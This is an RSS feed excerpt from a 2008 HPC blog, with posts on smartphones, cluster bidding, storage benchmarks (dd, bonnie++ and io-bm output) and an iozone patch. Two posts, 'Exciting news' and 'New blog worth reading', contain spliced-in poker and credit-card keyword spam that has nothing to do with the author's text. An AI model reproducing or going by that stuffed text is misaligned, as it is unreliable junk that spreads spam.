      <description>Yeah. 1 day with a Blackberry 8830. One day. Thats all I needed. I am sold. Best phone/device I have used. The Nokia E61 was close, but it didn&amp;rsquo;t work in the US on a 3G network. Palm Treo was good, but had too many issues. The windows hand helds are, well, not quite there. Windows mobile 6 is a huge improvement of windows mobile 5. That said, WM6 is IMO significantly behind BlackBerry on usability and performance.</description>
    </item>
    
    <item>
      <title>I am now part of the collective ...</title>
      <link>https://blog.scalability.org/2008/04/i-am-now-part-of-the-collective/</link>
      <pubDate>Fri, 11 Apr 2008 04:15:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/i-am-now-part-of-the-collective/</guid>
      <description>Yes, I got a BlackBerry. I had the Verizon xv6800 phone as a replacement for the abominable Motorola Q, which replaced a Treo 650. The Treo was ok, 2.5 day battery life with reasonable usage. It just rebooted and crashed at random. Went through 4 hand sets. The Q was terrible. Absolutely horrible. The 18 hour battery life was annoying. I thought the xv6800 would be better. Well, I was half right.</description>
    </item>
    
    <item>
      <title>knock knock knocking on petaflops door ...</title>
      <link>https://blog.scalability.org/2008/04/knock-knock-knocking-on-petaflops-door/</link>
      <pubDate>Thu, 10 Apr 2008 04:47:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/knock-knock-knocking-on-petaflops-door/</guid>
      <description>This article on HPCwire was a bit of an inspiration &amp;hellip; (with apologies to Bob Dylan, and Guns and Roses) Mama take this cluster from me I can&amp;rsquo;t run on it anymore It&amp;rsquo;s getting slow too slow for me Feels like I&amp;rsquo;m knockin&#39; on petaflops door
Knock-knock-knockin&#39; on petaflops door Knock-knock-knockin&#39; on petaflops door Knock-knock-knockin&#39; on petaflops door Knock-knock-knockin&#39; on petaflops door Mama take my single cores from the rack I can&amp;rsquo;t run on them anymore That cold data center air is comin&#39; down Feels like I&amp;rsquo;m knockin&#39; on petaflops door Knock-knock-knockin&#39; on petaflops door Knock-knock-knockin&#39; on petaflops door Knock-knock-knockin&#39; on petaflops door Knock-knock-knockin&#39; on petaflops door &amp;hellip; ok, I&amp;rsquo;ll keep my day job.</description>
    </item>
    
    <item>
      <title>old_stuff&#43;&#43;</title>
      <link>https://blog.scalability.org/2008/04/old_stuff/</link>
      <pubDate>Wed, 09 Apr 2008 20:48:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/old_stuff/</guid>
      <description>Ok &amp;hellip; a nice article on HPC startup issues (really IT startup issues) at insidehpc. This is a good article. Makes the point that people are willing to spend on incremental change, and the revolutionary change requires a serious investment from (multiple) big players. There are other reasons I like this article, but I won&amp;rsquo;t go into those here. The point that Christopher makes is spot on. Exactly right. Innovation needs to make things simply drop in and work, with as little pain as possible.</description>
    </item>
    
    <item>
      <title>Gonna need to play with W2k8 at some point ...</title>
      <link>https://blog.scalability.org/2008/04/gonna-need-to-play-with-w2k8-at-some-point/</link>
      <pubDate>Wed, 09 Apr 2008 20:09:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/gonna-need-to-play-with-w2k8-at-some-point/</guid>
      <description>I want to play with SUA and see how it fares against Cygwin. This is an issue for previous versions of Windows &amp;hellip; SUA isn&amp;rsquo;t available, or SFU is intrusive (I won&amp;rsquo;t install it on my laptop due to all the things it wants to touch). This arose from conversations in the day job yesterday. Still have to pull down W2k8 to see if we can run it on JackRabbit. I want to get real builds of code going so that we can see if there is any advantage to running in SUA vs Cygwin.</description>
    </item>
    
    <item>
      <title>In search of meaningful benchmarks</title>
      <link>https://blog.scalability.org/2008/04/in-search-of-meaningful-benchmarks/</link>
      <pubDate>Wed, 09 Apr 2008 00:51:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/in-search-of-meaningful-benchmarks/</guid>
      <description>Well, mostly I am interested in video/media streaming, real financial analytical/data-flow benchmarks (everyone does Black-Sholes, but is this the most meaningful benchmark to do?), and things from our friends in the petroleum industry. We want to put our JackRabbit storage systems to the test(s) as it were. One can run IOzone and bonnie++ so many times &amp;hellip;</description>
    </item>
    
    <item>
      <title>So how do you ...</title>
      <link>https://blog.scalability.org/2008/04/so-how-do-you/</link>
      <pubDate>Tue, 08 Apr 2008 04:26:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/so-how-do-you/</guid>
      <description>&amp;hellip; convince your cluster users not to run as root user? Yet another story for beer-time. Any advice out there on how to explain how bad (really really bad) of an idea this is? I have tried, but they seem to not make the connection between this and spurious failures of jobs. Testing the system as a normal user shows it runs fine. There is a joke this reminds me of.</description>
    </item>
    
    <item>
      <title>COTS supercomputing a danger?</title>
      <link>https://blog.scalability.org/2008/04/cots-supercomputing-a-danger/</link>
      <pubDate>Mon, 07 Apr 2008 14:44:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/cots-supercomputing-a-danger/</guid>
      <description>An article on HPCwire suggests that we live in dangerous times. Specifically
hmmm &amp;hellip;
We have limited choices due to economics and market evolution. Way back when RISC was still hot, many people ignored those pesky CISC machines coming up. When those pesky CISC machines started putting down benchmarks of 0.25-1.25 of the performance of the RISC machines, at 1/10th their cost, people started to take serious interest in using them.</description>
    </item>
    
    <item>
      <title>&#34;The Grid&#34;(TM) (with extra hype, no information content ...)</title>
      <link>https://blog.scalability.org/2008/04/the-gridtm-with-extra-hype-no-information-content/</link>
      <pubDate>Mon, 07 Apr 2008 12:21:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/the-gridtm-with-extra-hype-no-information-content/</guid>
      <description>I read an &amp;ldquo;amusing&amp;rdquo; piece this past weekend, where people connected with the LHC project at CERN talked about how they would do data distribution and computation. Basically they are building their own data network, and doing some interesting bits with large volume data caching/distribution.
Ok. Then we get this. You know, the &amp;ldquo;Grid&amp;rdquo; will make the internet obsolete. Oh bother. Let me ask a simple question of said media outlets.</description>
    </item>
    
    <item>
      <title>Yup ... what she said ...</title>
      <link>https://blog.scalability.org/2008/04/yup-what-she-said/</link>
      <pubDate>Mon, 07 Apr 2008 01:23:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/yup-what-she-said/</guid>
      <description>In a good Freep article today, Katherine Yung described some of the dilemmas surrounding raising capital in the state of Michigan.
Unfortunately for the state, the political echelon is targetting &amp;ldquo;advanced manufacturing&amp;rdquo;, as a priority, among several others.
Later on Ms. Yung notes:
Well, there is truth to that. But 2 years ago, during the initial 21st century fund effort, 700+ entrants applied for funds. Probably close to 400 companies. Quite a few would be called startups.</description>
    </item>
    
    <item>
      <title>Free advice for entrepreneurs ...</title>
      <link>https://blog.scalability.org/2008/04/free-advise-for-entrepreneurs/</link>
      <pubDate>Mon, 07 Apr 2008 00:31:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/free-advise-for-entrepreneurs/</guid>
      <description>Not legal advice, go speak with a lawyer if you want that. And understand that they have a vested interest in an alternative position to what I say below. When forming a startup, do not, unless you are a glutton for punishment, use an LLC structure, and run as far away, as rapidly as possible, from people who suggest you should use it. Lawyers love LLCs as you have to keep coming back to them for any change.</description>
    </item>
    
    <item>
      <title>yeah ... well ... ok</title>
      <link>https://blog.scalability.org/2008/04/yeah-well-ok/</link>
      <pubDate>Fri, 04 Apr 2008 04:44:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/yeah-well-ok/</guid>
      <description>page counter is broken. I put in StatPress. 1800 page visits yesterday (started at 10am) 2218 page visits as of midnight. Sheesh. This matches the logs and the post-read counts at the bottom. If you ask me, I do not have a clue as to what the page count is counting. So I am going to remove it soon from the right sidebar. What I can tell is, it is about 1 order of magnitude off.</description>
    </item>
    
    <item>
      <title>hrmmm ...</title>
      <link>https://blog.scalability.org/2008/04/hrmmm/</link>
      <pubDate>Wed, 02 Apr 2008 23:25:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/hrmmm/</guid>
      <description>So we have this counter plugin. And it counts slowly. I am not sure why. Looking over our logs, it seems that we have quite a bit of activity, though looking at the counter, it doesn&amp;rsquo;t look like it. So, I installed StatPress. Since 10am this monring (7pm now) we have had over 1000 visits. Yet the counter plugin reports barely 150 visits. These 1000 visits are about 1/2 RSS feeds, page views, and related.</description>
    </item>
    
    <item>
      <title>Confirmation on T&amp;C issue</title>
      <link>https://blog.scalability.org/2008/04/confirmation-on-tc-issue/</link>
      <pubDate>Wed, 02 Apr 2008 14:59:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/confirmation-on-tc-issue/</guid>
      <description>I had previously noted that some T&amp;amp;C;&amp;rsquo;s we run into are, well, not fit for company consumption. This isn&amp;rsquo;t the only aspect of of the HPC market &amp;hellip; clusters as commodities and other related phenomenon lead to extremely thin margins. As Doug at Lead Follow or &amp;hellip; notes in one of his posts on comments from an Intel person :
Yes Doug, I do. We walked away from a particularly onerous set of T&amp;amp;C.</description>
    </item>
    
    <item>
      <title>Speaking about LNXI (and SGI) ...</title>
      <link>https://blog.scalability.org/2008/04/speaking-about-lnxi-and-sgi/</link>
      <pubDate>Wed, 02 Apr 2008 14:00:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/speaking-about-lnxi-and-sgi/</guid>
      <description>John at InsideHPC blog has a brief writeup on an article I refrained from commenting on a few days ago. In John&amp;rsquo;s writeup, he (sarcastically) notes that going private didn&amp;rsquo;t help LNXI. Last I remember, LNXI was never public, they wanted it to be, but I don&amp;rsquo;t think they ever hit an IPO. That said, John&amp;rsquo;s writeup excerpts some of the AP article, with brief comments. My comments on the article are, basically, what took the investors so long?</description>
    </item>
    
    <item>
      <title>A subject touched on with the LNXI discussions</title>
      <link>https://blog.scalability.org/2008/04/a-subject-touched-on-with-the-lnxi-discussions/</link>
      <pubDate>Tue, 01 Apr 2008 19:49:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/a-subject-touched-on-with-the-lnxi-discussions/</guid>
      <description>I had talked briefly about terms and conditions of bids. We strive in the day job, to make sure ours are, shocking as it may be, reasonable. That is, they are not onerous, we don&amp;rsquo;t put thumbscrews to our customers, we simply ask them to pay on time or pay late fees, and agree to specific things that prevent misunderstandings in the future. We have it in our heads that somehow angering customers is a Bad Thing&amp;amp;tm; This said, you should see some of the RFP T&amp;amp;C; we are asked to agree to.</description>
    </item>
    
    <item>
      <title>Hola Barcelona!</title>
      <link>https://blog.scalability.org/2008/04/hola-barcelona/</link>
      <pubDate>Tue, 01 Apr 2008 14:14:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/hola-barcelona/</guid>
      <description>Rumor has it, on or about 4-April, we should be seeing some new chips. Will try to confirm.</description>
    </item>
    
    <item>
      <title>Site upgraded ... WP2.5</title>
      <link>https://blog.scalability.org/2008/03/site-upgraded-wp25/</link>
      <pubDate>Mon, 31 Mar 2008 01:12:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/site-upgraded-wp25/</guid>
      <description>This was, by far, the most painless upgrade of a complex software system I have ever done. That said, I don&amp;rsquo;t have a coverage test running to make sure everything is working, so please, by all means, kick the tires, make sure it all works.</description>
    </item>
    
    <item>
      <title>The silicon chip is falling, the silicon chip is falling ...</title>
      <link>https://blog.scalability.org/2008/03/the-silicon-chip-is-falling-the-silicon-chip-is-falling/</link>
      <pubDate>Fri, 28 Mar 2008 14:02:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/the-silicon-chip-is-falling-the-silicon-chip-is-falling/</guid>
      <description>on /. there is a link to a story on the imminent death of silicon semiconductor as a basis for computing. quoting &amp;hellip;
These predictions have a history of being wrong. This is not to say that silicon will go on forever. It is an indirect bandgap semiconductor which dissipates some energy as phonons (sound / heat waves in the material, think of hitting an iron bar, and the tones it makes, thats energy you imparted to sound heat in the material).</description>
    </item>
    
    <item>
      <title>Need to understand the SGI RASC BLAST benchmark</title>
      <link>https://blog.scalability.org/2008/03/need-to-understand-the-sgi-rasc-blast-benchmark/</link>
      <pubDate>Fri, 28 Mar 2008 06:04:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/need-to-understand-the-sgi-rasc-blast-benchmark/</guid>
      <description>Way back when, we developed a little scalable app called CT-BLAST, that ran BLAST in parallel on clusters. I had been thinking about re-doing this outside SGI when I first learned of MPI-BLAST some years ago. Since then many folks have tried accelerating BLAST. They do this because BLAST consumes so many cycles. Sadly, BLAST doesn&amp;rsquo;t seem to drive purchases &amp;hellip; That said, some people continue to target this as a core market.</description>
    </item>
    
    <item>
      <title>... and we have a winner ...</title>
      <link>https://blog.scalability.org/2008/03/and-we-have-a-winner/</link>
      <pubDate>Fri, 28 Mar 2008 01:21:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/and-we-have-a-winner/</guid>
      <description>Way way back, long long ago, I used mdbnch benchmark to test machines. I was amazed when SGI&amp;rsquo;s R8k got this done in under 20 seconds. The sub 15 second R10/R12k results were awesome. The sub 10 second Alpha results were amazing. That was about a decade ago. For a while, Opterons and Xeons have been in the 2-3 second range. Some recent chips were in the 1.4 second range. I always wondered when we would crack one second.</description>
    </item>
    
    <item>
      <title>A definition of funny ... or when context sensitive adverts are not appropriate ...</title>
      <link>https://blog.scalability.org/2008/03/a-definition-of-funny-or-when-context-sensitive-adverts-are-not-appropriate/</link>
      <pubDate>Mon, 24 Mar 2008 14:03:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/a-definition-of-funny-or-when-context-sensitive-adverts-are-not-appropriate/</guid>
      <description>Working through my Gmail account, cleaning things up (monday habit), I get over the the spam box. I don&amp;rsquo;t like spam. Not to many people I know like spam. Thats spam the mail, not spam the meat. This is important. So I blow away all the spam. And what should appear in the context sensitive advertising above the main text area (tastefully sized, unlike Yahoo mail where the advert is most of the page &amp;hellip; cough cough &amp;hellip;) but &amp;hellip;</description>
    </item>
    
    <item>
      <title>Why we (still) need Fortran, and why this won&#39;t change</title>
      <link>https://blog.scalability.org/2008/03/why-we-still-need-fortran-and-why-this-wont-change/</link>
      <pubDate>Sun, 23 Mar 2008 20:10:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/why-we-still-need-fortran-and-why-this-wont-change/</guid>
      <description>I saw a link to an article from /. on Wodehouse&amp;rsquo;s ideas in writing prose used for refactoring code. For those not in the know, code refactoring is the process of rewriting a code to be simpler, or more efficient, more expressive of the needs. What has this to do with Fortran, and in the bigger picture, HPC? Everything.
Fortran has not been in vogue in CS departments in this century, nor for the latter portion of the past century.</description>
    </item>
    
    <item>
      <title>Exciting news</title>
      <link>https://blog.scalability.org/2008/03/exciting-news/</link>
      <pubDate>Tue, 18 Mar 2008 16:16:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/exciting-news/</guid>
      <description>Well, you may have heard it already from other sources, but Scalable Informatics is now working with Wipro Technologies to provide high performance computing services, development, and support. We are quite excited by this, and in speaking to our current customers, we are getting good positive responses on this development. More pai gow pokeronline poker schoolpoker onlinefree texas holdem,free no limit texas holdem,free texas holdem poker downloadonline poker cheatingfree online texas holdem gamestrip poker gamevideo poker gamefree poker online,free online poker no download,free online pokerfree online texas hold emfree texas holdem poker site,free texas holdem poker,free texas holdem poker gameomaha hi lo,omaha hi lo strategy,hi limit lo omaha playpoker moneyfree poker,free poker game download,free on line pokerfree texas holdem poker playbest online pokerplay money pokertexas holdem electronic game,texas holdem game,download game holdem poker texasfree online 7 card studonline betting pokerpoker game downloadfree online poker tightpokerstrip poker downloadinternet poker gamefree poker downloadfree online video poker7 card stud low,limit 7 card stud,7 card studtexas holdem poker,texas holdem poker strategy,how to play texas holdem pokerplay texas holdem free,texas holdem,free texas holdem downloadstud poker,7 card stud poker rule,seven card stud pokeramerica card mbna credit bank,bank of america credit card,bank of america credit card processingcard credit number validationno credit cardvisa online credit card payment,online credit card payment solution,online credit card payment1st premier bank credit card,bank card credit premier,first premier bank secured credit cardnational city bank secured credit card,bank card city credit nationalno credit history credit card,card credit history no visa,card credit credit get history nolow interest credit card uk0 balance transfer credit cardcredit card debt relief,card credit debt disabled relief,card credit debt debt relief stopchase credit card online payment,chase credit card,chase credit card onlinechase student credit card,card chase credit student,card chase credit platinum studentbank card credit orchard payment0 application apr card credit,0 apr credit card applicationuk credit card companycard consolidate credit debtcard credit program reward,best card credit program reward,credit card reward program0 credit card,0 credit card rate,0 percent interest credit cardapply business card creditcard credit debt help xxasdf later.</description>
    </item>
    
    <item>
      <title>higher than average velocity these days ...</title>
      <link>https://blog.scalability.org/2008/03/higher-than-average-velocity-these-days/</link>
      <pubDate>Tue, 18 Mar 2008 16:10:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/higher-than-average-velocity-these-days/</guid>
      <description>&amp;hellip; been on 2 sets of airplanes in last 96 hours, will be on another tomorrow. Sorry about the posting delays &amp;hellip;</description>
    </item>
    
    <item>
      <title>... and 8 simultaneous buffered threads with 32 GB of files over  iSCSI</title>
      <link>https://blog.scalability.org/2008/03/and-8-simultaneous-buffered-threads-with-32-gb-of-files-over-iscsi/</link>
      <pubDate>Wed, 12 Mar 2008 07:16:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/and-8-simultaneous-buffered-threads-with-32-gb-of-files-over-iscsi/</guid>
      <description>root@jrs8:/home/scalable/io-bm# mpirun -np 8 ./io-bm.exe -n 32 -f /big/file -w [tid=0] each thread will output 4.000 gigabytes [tid=0] using buffered IO [tid=2] each thread will output 4.000 gigabytes [tid=0] page size ... 4096 bytes [tid=0] number of elements per buffer ... 2097152 [tid=5] each thread will output 4.000 gigabytes [tid=5] using buffered IO [tid=5] page size ... 4096 bytes [tid=2] using buffered IO [tid=2] page size ... 4096 bytes [tid=3] each thread will output 4.</description>
    </item>
    
    <item>
      <title>... and some bonnie&#43;&#43; numbers for same unit</title>
      <link>https://blog.scalability.org/2008/03/and-some-bonnie-numbers-for-same-unit/</link>
      <pubDate>Wed, 12 Mar 2008 07:01:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/and-some-bonnie-numbers-for-same-unit/</guid>
      <description>root@jrs8:/opt/scalable/bin# bonnie++ -u root -d /big -f Using uid:0, gid:0. Writing intelligently...done Rewriting...done Reading intelligently...done start &#39;em...done...done...done... Create files in sequential order...done. Stat files in sequential order...done. Delete files in sequential order...done. Create files in random order...done. Stat files in random order...done. Delete files in random order...done. Version 1.03 ------Sequential Output------ --Sequential Input- --Random- -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks-- Machine Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP /sec %CP jrs8 32096M 570921 83 142287 22 259411 19 773.</description>
    </item>
    
    <item>
      <title>Updated iSCSI numbers</title>
      <link>https://blog.scalability.org/2008/03/updated-iscsi-numbers/</link>
      <pubDate>Wed, 12 Mar 2008 06:37:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/updated-iscsi-numbers/</guid>
      <description>to disk, real disk, not nullio. Single JackRabbit over 10 GbE NIC to another single JackRabbit iSCSI unit.
buffered writes: root@jrs8:/opt/scalable/bin# dd if=/dev/zero of=/big/local.file bs=8M count=10000 10000+0 records in 10000+0 records out 83886080000 bytes (84 GB) copied, 167.568 seconds, 501 MB/s buffered reads: root@jrs8:/opt/scalable/bin# dd if=/big/local.file of=/dev/null bs=8M 10000+0 records in 10000+0 records out 83886080000 bytes (84 GB) copied, 322.052 seconds, 260 MB/s unbuffered writes: root@jrs8:/opt/scalable/bin# dd if=/dev/zero of=/big/local.file bs=8M count=10000 oflag=direct 10000+0 records in 10000+0 records out 83886080000 bytes (84 GB) copied, 202.</description>
    </item>
    
    <item>
      <title>Too cool ...</title>
      <link>https://blog.scalability.org/2008/03/too-cool/</link>
      <pubDate>Wed, 12 Mar 2008 05:25:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/too-cool/</guid>
      <description>VCwear &amp;ldquo;Don&amp;rsquo;t pitch me, bro&amp;rdquo; :)</description>
    </item>
    
    <item>
      <title>Dear spam-meisters of the world</title>
      <link>https://blog.scalability.org/2008/03/dear-spam-meisters-of-the-world/</link>
      <pubDate>Tue, 11 Mar 2008 13:04:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/dear-spam-meisters-of-the-world/</guid>
      <description>I am a (semi)poly-glot. Fluent (or barely so) in 2 languages. Can read characters of a third. If you push me hard (or give me time), I can even create my own mappings for a fourth (I did this with German and Cryllic/Russian when I visited Vienna and saw a war memorial).
But, and this is the important thing, I don&amp;rsquo;t know any of the rather large variety of languages you are sending spam to me in.</description>
    </item>
    
    <item>
      <title>Wow ...</title>
      <link>https://blog.scalability.org/2008/03/wow/</link>
      <pubDate>Mon, 10 Mar 2008 16:33:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/wow/</guid>
      <description>some time in the last few days we hit 100k views. Well, this is a little misleading, as I installed that plugin about halfway through the life of this blog, and from what I have seen of the logs, the plugin counter is missing ~40% of the views (usually one page referrals). It also ignores the rss feeds. As it turns out, this is important. What is interesting is looking on number of subscribers on google reader and others.</description>
    </item>
    
    <item>
      <title>Sherlock Holmes moment</title>
      <link>https://blog.scalability.org/2008/03/sherlock-holmes-moment/</link>
      <pubDate>Mon, 10 Mar 2008 16:26:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/sherlock-holmes-moment/</guid>
      <description>Read this at /. I guess it is not surprising that people would attempt to influence market forces to adjust the price they pay for labor. Increase the talent pool, and competition grows, lowering the price. Cool idea. [please note that this is dripping with sarcasm &amp;hellip; I am an avowed capitalist and do not believe that market manipulation is a good thing &amp;hellip; the invisible hand as it were, has a tendency to respond to market forces] We have seen this before though, in other labor markets.</description>
    </item>
    
    <item>
      <title>Intel e5405</title>
      <link>https://blog.scalability.org/2008/03/intel-e5405/</link>
      <pubDate>Mon, 10 Mar 2008 03:25:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/intel-e5405/</guid>
      <description>We are building a new version of a JackRabbit for a customer. During some of our testing, we booted it running SuSE 10.2 diskless, and I ran a GAMESS benchmark. We have been using this for years to exercise machines, and get rough performance comparisons. On 4 CPU Opteron 275&amp;rsquo;s with 8 GB ram, it takes ~3 hours. So I ran it recently on an AMD 2350 2.0 GHz quad core and our new JackRabbit.</description>
    </item>
    
    <item>
      <title>iozone patch to allow for larger tests</title>
      <link>https://blog.scalability.org/2008/03/iozone-patch-to-allow-for-larger-tests/</link>
      <pubDate>Mon, 10 Mar 2008 01:24:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/iozone-patch-to-allow-for-larger-tests/</guid>
      <description>As noted a few times here, iozone as written, has numerous hard-wired quantities within it, some of which impede testing for large and fast systems. Here is a simple patch to fix one of the issues &amp;hellip;
diff -uNr iozone3_283/src/current/iozone.c iozone3_283.new/src/current/iozone.c --- iozone3_283/src/current/iozone.c 2007-02-19 12:12:18.000000000 -0500 +++ iozone3_283.new/src/current/iozone.c 2007-09-12 11:47:19.000000000 -0400 @@ -741,7 +741,7 @@ /* At 16 Meg switch to large records */ #define CROSSOVER (16*1024) /* Maximum buffer size*/ -#define MAXBUFFERSIZE (16*1024*1024) +#define MAXBUFFERSIZE (1024*1024*1024) #endif /* Maximum number of children.</description>
    </item>
    
    <item>
      <title>sometimes ya gots to shakes ya head in disbelief</title>
      <link>https://blog.scalability.org/2008/03/sometimes-ya-gots-to-shakes-ya-head-in-disbelief/</link>
      <pubDate>Fri, 07 Mar 2008 16:43:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/sometimes-ya-gots-to-shakes-ya-head-in-disbelief/</guid>
      <description>We submitted a bid for a cluster. A large one, and we were being very aggressive on price. Very thin margins, spoke with our suppliers to make sure we got the best deal we could get. Come the bid open and &amp;hellip; we are on the high side. Some of the bids are lower than our cost of materials. Ok, if everyone is bidding the same thing, how is this possible?</description>
    </item>
    
    <item>
      <title>New blog worth reading</title>
      <link>https://blog.scalability.org/2008/03/new-blog-worth-reading/</link>
      <pubDate>Fri, 07 Mar 2008 01:28:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/new-blog-worth-reading/</guid>
      <description>My friend Doug O&amp;rsquo;Flaherty has a new blog. I won&amp;rsquo;t mention Doug&amp;rsquo;s affliation, as this is not actually part of his online persona &amp;hellip; he is not a corporate blogger. My take is that he wanted to talk about what he was seeing, thinkingVariationen von poker regeln. and hearing in sections of the HPC market. Well worth the read, and as always, Doug is insightful and incisive. Adding it to my blogroll.</description>
    </item>
    
    <item>
      <title>World record data transfer with a JackRabbit? ... well ... no ...</title>
      <link>https://blog.scalability.org/2008/03/world-record-data-transfer-with-a-jackrabbit-well-no/</link>
      <pubDate>Wed, 05 Mar 2008 03:03:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/world-record-data-transfer-with-a-jackrabbit-well-no/</guid>
      <description>On Sunday 2-March-2008, 18TB of data was moved 1050 km in 12 hours. The network fabric and technology that brought this to being? The US interstate system, and our truck. Physical transport of media is still the bandwidth leader.
This means that the interstate system transported about 1.5 TB/hour, or 0.42 GB/s. 420 MB/s And yes, a JackRabbit did make its way across Ohio, West Virginia , Virginia, and finally came to rest in its new home in North Carolina.</description>
    </item>
    
    <item>
      <title>Windows server 2008:  sounds quite interesting</title>
      <link>https://blog.scalability.org/2008/02/windows-server-2008-sounds-quite-interesting/</link>
      <pubDate>Fri, 29 Feb 2008 18:22:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/windows-server-2008-sounds-quite-interesting/</guid>
      <description>Componentized, stripped of all garbage^H^H^H^H^H^H^H^Hthings you don&amp;rsquo;t need in a server, modularized &amp;hellip; Ok, so when can we play with it to see if it takes to our JackRabbits and clusters? We are loading almost all our OSes via diskless/CF, and I would love to do this with WS2k8. That and I want to get iozone, bonnie, and other tools ported. Our io-bm should work nicely, all we need is an MPI stack, and we can do parallel IO.</description>
    </item>
    
    <item>
      <title>If this is true, then it is almost a good thing</title>
      <link>https://blog.scalability.org/2008/02/if-this-is-true-then-it-is-almost-a-good-thing/</link>
      <pubDate>Wed, 27 Feb 2008 15:51:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/if-this-is-true-then-it-is-almost-a-good-thing/</guid>
      <description>Readthis, this morning on /. . In short Microsoft will implement its own GNU compatible environment. Why is it almost a good thing? Simple. There exists a great environment now, for all of this. Called Cygwin. I had been trying to convince the Microsoft people for a while now, to get behind this effort, and support this wholeheartedly, on windows. I made the point to Kyril Faenov at SC07, and to multiple others at Microsoft for the past 2+ years.</description>
    </item>
    
    <item>
      <title>Compact flash booting for SuSE, RHEL, OpenFiler, Ubuntu</title>
      <link>https://blog.scalability.org/2008/02/compact-flash-booting-for-suse-rhel-openfiler-ubuntu/</link>
      <pubDate>Tue, 26 Feb 2008 02:12:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/compact-flash-booting-for-suse-rhel-openfiler-ubuntu/</guid>
      <description>Well, we did it. We now have 4 GB CF images to boot our JackRabbit&amp;rsquo;s from SuSE 10.2 and 10.3, RHEL 4 and 5, OpenFiler 2.2 (2.3 also works), and Ubuntu. This is nice in that it is simple to replicate our installs. Installing SuSE 10.2 is painful (Zenworks &amp;hellip; thats all you have to say) Myricom 10 GbE drivers, and we will make sure we have the Intel ixgbe drivers as well.</description>
    </item>
    
    <item>
      <title>multi-&gt;many core</title>
      <link>https://blog.scalability.org/2008/02/multi-many-core/</link>
      <pubDate>Mon, 25 Feb 2008 16:34:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/multi-many-core/</guid>
      <description>For a while now, privately, and publically, I have been suggesting to the good folks at AMD that they ought to build an 8 core chip, literally by gluing two quad Barcelona&amp;rsquo;s to a die and connecting them with Hypertransport. The point I have been making is that Intel is going to do something like this, really soon, and if they wish to compete, they ought to get to market first with their version.</description>
    </item>
    
    <item>
      <title>Interesting take on bad CIOs, and some of the things they do ...</title>
      <link>https://blog.scalability.org/2008/02/interesting-take-on-bad-cios-and-some-of-the-things-they-do/</link>
      <pubDate>Sat, 23 Feb 2008 13:15:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/interesting-take-on-bad-cios-and-some-of-the-things-they-do/</guid>
      <description>/. linked to this story on cio.com. I read it, and there are some gems. Things I have seen corporate IT leadership folks do. While reading it, I was thinking &amp;ldquo;gee, wouldn&amp;rsquo;t it be funny if the problem of vendor favoritism showed up?&amp;rdquo;. That is, when specific vendors are chosen above others, not because of technological reasons, or valid business reasons, but because the CIO or IT leader wants to do business with people they know.</description>
    </item>
    
    <item>
      <title>Target ubiquity: a business model for accelerators in HPC</title>
      <link>https://blog.scalability.org/2008/02/target-ubiquity-a-business-model-for-accelerators-in-hpc/</link>
      <pubDate>Fri, 22 Feb 2008 19:02:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/target-ubiquity-a-business-model-for-accelerators-in-hpc/</guid>
      <description>I am a strong proponent of APUs, and accelerators in general. It is fairly obvious that the explosion in cores on single sockets results in a bandwidth wall, that we have to work around. The reason for many more cores, and for SSE and other techniques is fundamentally to increase the number of processor cycles available per unit time. SSE attempts to increase the efficiency of these cycles by allowing them to do more work per unit time.</description>
    </item>
    
    <item>
      <title>HPC market data from IDC</title>
      <link>https://blog.scalability.org/2008/02/hpc-market-data-from-idc/</link>
      <pubDate>Thu, 21 Feb 2008 18:24:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/hpc-market-data-from-idc/</guid>
      <description>As reported on HPCWire. Major features:
 * Server portion of the market is $11.6B growing 15.5% CAGR * Over 5 years (2002-2007) the HPC server market has grown 134%, and is projected to reach $15B by 2011  What is interesting is that some of the markets grew in different ways than in the past.
